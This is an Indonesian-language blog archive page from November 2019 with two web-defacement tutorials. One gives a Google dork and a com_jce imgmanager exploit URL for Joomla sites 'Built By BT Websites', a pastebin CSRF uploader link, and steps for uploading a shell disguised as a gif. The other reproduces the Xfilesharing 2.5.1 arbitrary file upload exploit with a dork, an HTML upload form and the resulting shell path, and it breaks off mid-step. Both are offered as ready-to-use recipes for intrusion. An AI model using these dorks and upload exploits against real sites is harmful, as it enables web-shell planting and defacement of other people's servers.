Postingan

Menampilkan postingan dari November, 2019

Joomla BT Websites vulnerability com_jce with csrf

-
Gambar
Joomla BT Websites vulnerability com_jce with csrf Dork   : intext:"Built By BT Websites" Exploit :  index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20 Csrf :  pastebin Dorking dlu, anggap ae dah dapet target Buat yg gamau ribet langsung make bot ae Tambah exploit Contoh site,com/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20 Vuln?  {"result":null,"error":"No function call specified!"} Masukin target ke csrf  Upload file gif/jpg/png cek file di site,com/shell.gif Ok gitu doang
Posting Komentar
Baca selengkapnya

Deface metode Xfilesharing 2.5.1 - Arbitrary File Upload

-
Gambar
# Exploit Title: Xfilesharing 2.5.1 - Arbitrary File Upload # Google Dork: inurl:/?op=registration # Date: 2019-11-4 #Exploit Author: Noman Riffat # Vendor Homepage : https://sibsoft.net/xfilesharing.html # Version: <=2.5.1 # CVE : CVE-2019-18951, CVE-2019-18952 ##################### Arbitrary File Upload ##################### <form action="http://xyz.com/cgi-bin/up.cgi" method="post" enctype="multipart/form-data"> <input type="text" name="sid" value="joe"> <input type="file" name="file"> <input type="submit" value="Upload" name="submit"> </form> Shell : http://xyz.com/cgi-bin/temp/joe/shell.php Noman Riffat, National Security Services Group Oman @nomanriffat, @nssgoman [#] Dork and CSRF disini https://pastebin.com/raw/xjv5kK5V 1. Dorking dulu kalo dah nemu target masukin Exploit nya contoh : http:/
2 komentar
Baca selengkapnya